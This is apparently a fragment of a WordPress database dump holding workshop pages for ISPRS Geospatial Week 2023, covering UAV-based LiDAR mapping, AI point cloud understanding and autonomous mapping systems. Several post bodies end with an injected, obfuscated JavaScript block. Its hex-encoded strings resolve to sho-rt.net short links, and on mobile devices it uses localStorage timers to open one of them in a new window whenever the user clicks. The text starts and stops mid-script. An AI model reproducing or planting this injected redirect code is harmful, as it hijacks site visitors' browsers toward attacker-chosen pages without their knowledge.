_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based mapping with imaging and LiDAR systems: challenges, data processing, and applications','','publish','closed','closed','','uav-based-mapping-with-imaging-and-lidar-systems-challenges-data-processing-and-applications','','','2023-02-05 11:17:09','2023-02-05 11:17:09','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2574',0,'dt_portfolio','',0),
(2575,1,'2022-10-07 20:11:09','2022-10-07 20:11:09','','mws5','','inherit','open','closed','','mws5','','','2022-10-07 20:11:09','2022-10-07 20:11:09','',2574,'https://gsw2023.com/wp-content/uploads/2022/10/mws5.jpg',0,'attachment','image/jpeg',0),
(2576,1,'2022-10-07 20:11:21','2022-10-07 20:11:21','','UAV-based mapping with imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','2574-revision-v1','','','2022-10-07 20:11:21','2022-10-07 20:11:21','',2574,'https://gsw2023.com/?p=2576',0,'revision','',0),
(2577,1,'2022-10-07 20:12:45','2022-10-07 20:12:45','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2578\" img_size=\"450x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">AI-PC: AI-based Point Cloud and Image Understanding</span></strong></h5>\r\n<h5></h5>\r\n<h5></h5>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>Recent rapid and revolutionary development of AI-based techniques has brought remarkably eye-catching and competitive achievements in a wide variety of point cloud and image data interpretation tasks including landmark recognition, semantic segmentation, change detection, etc. This workshop will see contributions the topics related the state of the art and future trends addressed the following topics: new point cloud and image algorithm designs, point clouds element detection and segmentation, sensor fusion algorithms, 3D LiDAR from airborne, terrestrial, mobile and backpack autonomous systems and applications, change detection from point cloud and image data, 3D real scene, deep learning methods for point cloud and image processing, etc.</strong></h5>\r\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\r\n<h1 style=\"text-align: left;\"><strong>CHAIRS</strong></h1>\r\n<p>[/vc_column_text][vc_separator color=\"juicy_pink\" style=\"double\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"40\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>3D LiDAR processing</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>LiDAR and image fusion systems</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>AI-based methods on point cloud processing technologies</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>AI-based methods on image processing technologies</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Point cloud and image detection</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Visual Odometry and LiDAR 3D SLAM</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Semantic Segmentation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Instance Segmentation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Elements extraction from LiDAR and image data</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>LiDAR altimetry</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Deep learning algorithms based on LiDAR and image</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Change detection</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Benchmark dataset using point clouds and image</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>3D LiDAR from autonomous systems and applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>UAV-based LiDAR and photogrammetry cloud points processing</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Leila Hashemi Beni, North Carolina A&amp;T State University, USA</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Yiping Chen, Sun Yat-sen University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Luis Miguel González de Santos, University of Vigo, Spain</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Haiyan Guan, Nanjing University of Information Science and Technology, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Samsung Lim, University of New South Wales, Australia </strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Michael A. Chapman,Toronto Metropolitan University, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Yuwei Chen, Finnish Geospatial Research Institute (FGI), Finland</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"juicy_pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','AI-PC: AI-based Point Cloud and Image Understanding','','publish','closed','closed','','ai-pc-ai-based-point-cloud-and-image-understanding','','','2023-02-05 11:20:57','2023-02-05 11:20:57','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2577',0,'dt_portfolio','',0),
(2578,1,'2022-10-07 20:12:35','2022-10-07 20:12:35','','mws6','','inherit','open','closed','','mws6','','','2022-10-07 20:12:35','2022-10-07 20:12:35','',2577,'https://gsw2023.com/wp-content/uploads/2022/10/mws6.jpg',0,'attachment','image/jpeg',0),
(2579,1,'2022-10-07 20:12:45','2022-10-07 20:12:45','','AI-PC: AI-based Point Cloud and Image Understanding','','inherit','closed','closed','','2577-revision-v1','','','2022-10-07 20:12:45','2022-10-07 20:12:45','',2577,'https://gsw2023.com/?p=2579',0,'revision','',0),
(2580,1,'2022-10-07 20:13:56','2022-10-07 20:13:56','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2581\" img_size=\"600x250\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>IAMS - Intelligent and autonomous mapping systems</strong></span></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will seek contributions covering the developments of autonomous mobile sensing and mapping systems and their use in the next generation of Geospatial applications. This workshop aims to bring together communities keen on developing the next generation of drones and uncrewed platforms in general, such as robotics and computer science.</strong></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The focus will be on the advancements in the algorithms embedded in autonomous platforms navigating in outdoor and confined/indoor spaces. Topics of interest include, but not limited to, the development of real-time drone remote sensing analytics algorithms considering edge/fog/cloud computing, innovative georeferencing techniques, deep learning algorithms for situational awareness and autonomous navigation and exploration, as well as collaborative and swarm SLAM algorithms. Lightweight, energy-efficient, replicable hardware and software solutions and their embedding in larger networks of sensors, are particularly of interest for this workshop. A specific focus will be given to BVLOS solutions and the use of autonomous platforms in urban and rural environments. The Workshops will address different monitoring and surveying applications performed by innovative autonomous platforms such as precision farming, disaster mapping, cultural heritage survey, natural environment, and infrastructure monitoring. </strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][vc_separator color=\"turquoise\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"41\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Drones, ground and underwater autonomous systems</strong></h6>\n</li>\n<li>\n<h6><strong>Autonomous path planning, SLAM, navigation, drone-in-the-box, and VLOS/BVLOS exploration</strong></h6>\n</li>\n<li>\n<h6><strong>Edge, fog, and cloud computing for real-time scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>3D real-time mapping and semantic analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Next-generation autonomous platform applications</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative active and passive sensors embedded on autonomous platforms</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative and swarm platforms for Geospatial applications</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bashar Alsadik, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Costas Armenakis, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>John Ray Bergado, University of Twente, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>Filiberto Chiabrando, Politecnico di Torino, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Davide Cucci, Pix4D, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Martina Di Rita, Leica Geosystems, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Diogo Duarte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Markus Gerke, TU Braunschweig, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Diego González Aguilera, University of Salamanca, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Ejia Honkavaara, NLS, Finland</strong></h6>\n</li>\n<li>\n<h6><strong>Phillipp Jende, AIT, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Andreas Kamilaris, CYENS, Cyprus</strong></h6>\n</li>\n<li>\n<h6><strong>Taejung Kim, Inha University, South Korea</strong></h6>\n</li>\n<li class=\"m_-609275506827755887MsoListParagraphCxSpFirst\">\n<h6><span lang=\"EN-US\">Raquel Alves de Oliveira, NLS, Finland</span><u></u></h6>\n</li>\n<li class=\"m_-609275506827755887MsoListParagraphCxSpMiddle\">\n<h6><span lang=\"EN-US\">Juha Röning, University of Oulu, Finland</span><u></u></h6>\n</li>\n<li class=\"m_-609275506827755887MsoListParagraphCxSpLast\">\n<h6><span lang=\"EN-US\">Lorenzo Teppati Losè, Politecnico di Torino, Italy</span></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 